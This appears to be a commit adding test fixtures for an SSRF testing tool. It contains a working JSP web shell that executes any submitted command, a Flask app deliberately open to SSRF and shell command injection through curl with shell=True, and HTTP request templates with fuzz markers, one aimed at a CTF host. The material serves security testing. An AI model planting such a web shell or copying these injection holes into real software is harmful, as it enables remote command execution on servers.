Add files via upload

Author: errorfiathck

data/cmd.jsp

@@ -0,0 +1,23 @@
+<%@ page import="java.util.*,java.io.*"%>
+<HTML><BODY>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "<BR>");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+</pre>
+</BODY></HTML>

data/example.py

@@ -0,0 +1,58 @@
+# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# FLASK_APP=example.py flask run
+
+from flask import Flask, abort, request 
+import json
+import re
+import subprocess
+
+app = Flask(__name__)
+
+@app.route("/")
+def hello():
+    return "SSRF Example!"
+
+# curl -i -X POST -d 'url=http://example.com' http://localhost:5000/ssrf
+@app.route("/ssrf", methods=['POST'])
+def ssrf():
+    data = request.values
+    content = command(f"curl {data.get('url')}")
+    return content
+
+# curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2
+@app.route("/ssrf2", methods=['POST'])
+def ssrf2():
+    data = request.json
+    print(data)
+    print(data.get('url'))
+    content = command(f"curl {data.get('url')}")
+    return content
+
+# curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" 
+@app.route("/ssrf3", methods=['GET'])
+def ssrf3():
+    data = request.values
+    content = command(f"curl {data.get('url')}")
+    return content
+
+# curl -X POST -H "Content-Type: application/xml" -d '<run><log encoding="hexBinary">4142430A</log><result>0</result><url>http://google.com</url></run>' http://127.0.0.1:5000/ssrf4
+@app.route("/ssrf4", methods=['POST'])
+def ssrf4():
+    data = request.data
+    print(data.decode())
+    regex = re.compile("url>(.*?)</url")
+    try:
+        url = regex.findall(data.decode())[0]
+        content = command(f"curl {url}")
+        return content
+    except Exception as e:
+        return e
+
+def command(cmd):
+    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
+    (out, err) = proc.communicate()
+    return out
+
+if __name__ == '__main__':
+    app.run(host='127.0.0.1', port=5000, debug=True)

data/request.txt

@@ -0,0 +1,13 @@
+POST /ssrf HTTP/1.1
+Host: 127.0.0.1:5000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://mysimple.ssrf/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 31
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+url=https%3A%2F%2Fwww.google.fr

data/request2.txt

@@ -0,0 +1,13 @@
+POST /ssrf2 HTTP/1.1
+Host: 127.0.0.1:5000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1:5000/
+Content-Type: application/json
+Content-Length: 43
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+{"userId":"1", "url": "http://example.com"}

data/request3.txt

@@ -0,0 +1,9 @@
+GET /ssrf3?url=SSRF HTTP/1.1
+Host: 127.0.0.1:5000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://mysimple.ssrf/
+Connection: close
+Upgrade-Insecure-Requests: 1

data/request4.txt

@@ -0,0 +1,9 @@
+POST /ssrf4 HTTP/1.1
+User-Agent: User-agent
+Host: 127.0.0.1:5000
+Connection: close
+Accept-Encoding: gzip, deflate
+Content-Type: application/xml
+Content-Length: 149
+
+<run><log encoding="hexBinary">4142430A</log><result>0</result><url>*FUZZ*</url></run>

data/request5.txt

@@ -0,0 +1,16 @@
+POST /index.php HTTP/1.1
+Host: ctf.hacklab-esgi.org:8082
+Content-Length: 5
+Cache-Control: max-age=0
+Origin: http://ctf.hacklab-esgi.org:8082
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 OPR/60.0.3255.15 (Edition beta)
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://ctf.hacklab-esgi.org:8082/
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: session=718ec500-02c9-433e-ac3d-ece753ee1169
+Connection: close
+
+url=FUZZME